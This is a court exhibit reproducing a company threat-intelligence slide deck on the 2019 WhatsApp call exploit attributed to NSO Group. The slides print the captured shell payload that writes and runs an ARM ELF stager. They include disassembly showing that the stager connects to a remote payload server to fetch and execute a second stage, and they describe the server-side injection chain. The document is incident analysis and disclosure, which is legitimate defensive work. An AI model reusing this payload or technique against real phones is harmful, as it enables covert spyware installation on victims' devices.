UNITED STATES DISTRICT COURT

NORTHERN DISTRICT OF
CALIFORNIA

Case #:    4:19-cv-07123-PJH

Plntf Exhibit No.    PTX-0930

Date Admitted:    _____

By:    _____

Kelly Collins, Deputy Clerk

Document Produced in Native Format

Highly Confidential - Attorneys' Eyes Only



EXHIBIT

1206

# **NSODays**

**Drew Robinson**

Corp Threat Intel

PTX-0930.0003

# Upfront Credit

- This represents the work of a huge number of people.

PTX-0930.0004

- Early May

PTX-0930.0005

# WhatsApp Logs

```
chatd0016.atn:
"(w=com.whatsapp;t=/data/data/$w/files/t;e=echo;c=\"chmod
777\";g=grep;v=/system/bin/am;u=$(which id>/dev/null && $e $(( `id | $g -oE \"uid=[0-
9]+\" | $g -oE \"[0-9]+\"` / 100000)) || $e 0);cp $v ${t}p;s=\"stopservice --user $u
$w/.voipcalling.VoiceFGService;\";$v $s || ${t}p $s;rm ${t}*;$e -en
\"\\x7fELF\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x20\\x00\\x02\\x00\\x28\
\x00\\x20\\x00\\x20\\x00\\x20\\x00\\x20\\x00\\x04\\x00\\x00\\x00\\x19q\\x00\\xe3\\x00\
\x20\\xb0\\xe34\\x00\\x20\\x00\\x01\\x00\\x00\\x00\\x12\\xc0\\x8f\\xe2\\x01\\xc0\\x8c\
\xe2\\x1c\\xff\\x2f\\xe1iF0\\x00\\x00\\xdf\\x01D\\x12\\x1a\\xfa\\xd1pG\\x02\\x20\\x01\
\x21\\x00\\xdf\\x06\\x00\\x027\\x0f\\xf20\\x01\\x10\\x22\\x00\\xdf\\x04\\x270\\x00\\x0
81\\x00\\xdf\\x20\\xb4\\x04\\x22\\x03\\x27\\xff\\xf7\\xe7\\xff\\x04\\xbc\\x15\\x00\\xa
d\\xeb\\x02\\x0d\\xff\\xf7\\xe1\\xff\\x04\\x27\\x01\\x26\\x2a\\x00\\xff\\xf7\\xdc\\xff
\\x01\\x27\\x00\\xdf\\x02\\x00\\xff\\x01\\xb9m\\xa8\\x14d4tX${t}z\\x00\">$t;$c
$t;$t>${t}z;$c ${t}z;${t}z 14a86db9 00001f93 c1c82fe5 623acb3c;rm ${t}*;)"
```

PTX-0930.0006

# Breaking It Down

- w=com.whatsapp;
    - WhatsApp APK pkg name
- t=/data/data/$w/files/t;
    - Path on Android device to WA files/t.
- e=echo;
- c=\"chmod 777\";
- g=grep;
- v=/system/bin/am;
    - Android ActivityManager

PTX-0930.0007

# Breaking It Down (cont.)

- u=$(which id>/dev/null && $e $((`id | $g -oE \"uid=[0-9]+\" | $g -oE \"[0-9]+\"` / 100000)) || $e 0);
  - Get UID for the application
- cp $v ${t}p;
  - Copy ActivityManager bin to /data/data/$w/files/tp
- s="stopservice --user $u $w/.voipcalling.VoiceFGService;";
  - Intended to stop a part of the WA voice calling.
- $v $s || ${t}p $s;
  - Invoke ActivityManager to try and stop the VoiceFGService which is responsible for foreground notifications of an incoming voice call.

PTX-0930.0008

# Breaking It Down (fin.)

- rm ${t}*;
- $e -en \"\\x7fELF<snip>\\x14d4tX${t}z\\x00\">$t;
  - Writes out an ELF with a WA relative path in it.
- $c $t;
  - chmod
- $t>${t}z;
  - Execute ELF, pipe output
- $c ${t}z;
  - Chmod output
- ${t}z 14a86db9 00001f93 c1c82fe5 623acb3c;
- rm ${t}*;

PTX-0930.0009



PTX-0930.0010



PTX-0930.0011

```
0028 ;
0028             MOV         R7, #0x119
0024            MOVS        R2, #0
002E            EOREQ       R0, R0, R4,LSR R0
002C            ANDEQ       R0, R0, R1
0030            ADRL        R12, (sub_4A+1)
0038            BX          R12         ; sub_4A
003C            CODE16
003C
003C ; =============== S U B R O U T I N E ===============
003C
003C
003C do_syscall                         ; CODE XREF: sub_4A+20↓p
003C                                    ; sub_4A+2C↓p ...
003C            MOV         R1, SP
003E loc_3E                             ; CODE XREF: do_syscall+A↓j
003E            MOVS        R0, R6
0040            SVC         0
0042            ADD         R1, R0
0044            SUBS        R2, R2, R0
0046            BNE         loc_3E
0048            BX          LR
0048 ; End of function do_syscall
0048
004A
004A ; =============== S U B R O U T I N E ===============
004A
004A ; Attributes: noreturn
004A
004A sub_4A                             ; CODE XREF: ROM:00000038↑j
004A                                    ; DATA XREF: ROM:00000030↑o
004A            MOVS        R0, #2      ; AF_INET
004C            MOVS        R1, #1      ; SOCK_STREAM
004E            SVC         0           ; socket(domain = 2 (AF_INET), type = 1 (SOCK_STREAM), family = 0 (TCP))
0050            MOVS        R6, R0      ; r6 = socket_fd
0052            ADDS        R7, #2      ; connect()
0054            ADR.W       R1, byte_88 ; struct sockaddr
0058            MOVS        R2, #0x10
005A            SVC         0           ; connect()
005C            MOVS        R7, #4
005E            MOVS        R0, R6      ; socket_fd
0060            ADDS        R1, #8      ; buf: 0x88+0x8 = 0x90
0062            SVC         0           ; write
0064            PUSH        {R5}
0066            MOVS        R2, #4
0068            MOVS        R7, #3      ; read
006A            BL          do_syscall
006E            POP         {R2}
0070            MOVS        R5, R2
0072            SUB.W       SP, SP, R2
0076            BL          do_syscall  ; write
007A            MOVS        R7, #4
007C            MOVS        R6, #1
007E            MOVS        R2, R5
0080            BL          do_syscall
0084            MOVS        R7, #1
0086            SVC         0
0086 ; End of function sub_4A
0086
```

PTX-0930.0012

# Secondary Payload Server (SPS) Extraction

```
sockaddr_extract = r"(\\\\x02\\\\x00.{30,50}\\\")"
...
def parse_sock_struct(sockaddr):
    sockaddr = sockaddr.replace('\\\\', '\\')
    sockaddr = sockaddr.decode('string_escape')
    port = struct.unpack(">H", sockaddr[2:4])[0]
    ip = ""
    for o in sockaddr[4:8]:
        ip += str(ord(o)) + "."
    ip = ip[:-1]
    key = sockaddr[8:12]
    #ret_val = "{ip}:{port} - {key}".format(ip=ip, port=port, key=key)
    return (ip, port, key)
```

PTX-0930.0013

# What Does It Do?

- Opens a TCP socket
- Connects using sockaddr struct at specific address
- Writes 16 bytes from within the file to the socket
- Reads 4 bytes from the socket (we'll call this i)
- Reads i bytes from the socket (we'll call these j)
- Writes j to STDOUT
- $t>${t}z;
  - Execute ELF, pipe output

PTX-0930.0014

# So WTF is Going On

2019/05/05-04:30:37.446786 <0.9683.2021> voip_validation:415 === [rate-limited] Failed VoIP stanza validation:

{envelope,{wid,<<"REDACTED">>},'c.us',{resource,android,2,19,98,0,success}},

'chatd@chatd0016.atn',

{wid,<<"REDACTED">>,'c.us',none},

nil,'#call',<<"79F4779A7B7AD1DBBB3B34F9367F59DB">>,

{{compressed_size,undefined},{plaintext_size,1904},{enc_version,2},{enc_count,0},{ts,{1557,55837,446725}},{notify_name,<<"REDACTED">>}],

131584,

[{el,'#offer',

[{'#call-id',<<"9D7971F5199DD8DC93B8B976BEF0F397">>},{'#call-creator',"REDACTED@s.whatsapp.net"}],

[{el,'#re',[{"caller_implicit_active","0"}],[]},

{el,'#encode',[{"sampling_rate","33975"}],[]},

{el,'#xor_cipher',[{'#enabled',"1"},{'#on_rtp',"true"},{'#p1',"6700417"},{'#p2',"31079"}],[]},

{el,'#audio',[{'#enc',"opus"},{'#rate',"8000"}],[]},

{el,'#audio',[{'#enc',"opus"},{'#rate',"16000"}],[]},

{el,'#video',[{'#enc',"h.264"},{'#orientation',"1"},{'#screen_width',"1080"},{'#screen_height',"1920"}],[]},

{el,'#video',[{'#enc',"vp8/h.264"},{'#orientation',"1"},{'#screen_width',"1080"},{'#screen_height',"1920"}],[]},

{el,'#video',[{'#enc',"vp8"},{'#orientation',"1"},{'#screen_width',"1080"},{'#screen_height',"1920"}],[]},


{el,'#options',

                [

                                {'#media_pipeline_setup_wait_threshold_in_msec',"0"},

                                {"connecting_tone_desc", "(w=com.whatsapp...}

                ]

}

# How Calls on WA Work

- Person A wants to call Person B
- Each person in a potential convo will have different capabilities
- Negotiation phase, facilitated by WA server
- Performs things like bandwidth estimation, codec identification
- Each member in a call sends info on the negotiation to WA server which relays it to others.

PTX-0930.0016

# connecting_tone_desc

- Server-side vulnerability
- Modern code is supposed to filter those settings which result from the negotiation phase.
- Sent an old format which still existed for backward compat reasons to the negotiation server

PTX-0930.0017

# Exploit Full Chain

- Attacker sends a 1:1 call offer to a victim, injecting bash commands.
  - This triggers a call on the user's phone.
- At this point the attacker can actively send data to the victim's device.
- Begins process for exploiting the now publicized client-side overflow vulnerability.

PTX-0930.0018

# Exploit Full Chain (cont.)

- Overwrites some pointers
- Upgrades the 1:1 call to a group call
  - Adds second attacker phone number to the call
- Doing so triggers some callbacks which attackers were previously able to overwrite pointers for.
- This triggers exec of the bash script from the connecting_tone_desc.

PTX-0930.0019

# Victim Perspective?

- Your phone starts ringing
- It stops before you can answer
- You're owned

PTX-0930.0020

# Our Fix

- Coordinating the patch was complicated
- Balancing equities
- Need to fix both server and client
- Pushed server-side fix May 10
- Client side fixes sent to Play Store, to appear on May 13

PTX-0930.0021

# WhatsApp voice calls used to inject Israeli spyware on phones

Messaging app discovers vulnerability that has been open for weeks

The malicious code, developed by the secretive Israeli company NSO Group, could be transmitted even if users did not answer their phones, and the calls often disappeared from call logs, said the spyware dealer, who was recently briefed on the WhatsApp hack.

PTX-0930.0022

# So Where's the NSO?

- Lots of SPSs
- Overlap with overt NSO owned infrastructure

REDACTED

PTX-0930.0023

REDACTED

PTX-0930.0024

# Questions

PTX-0930.0025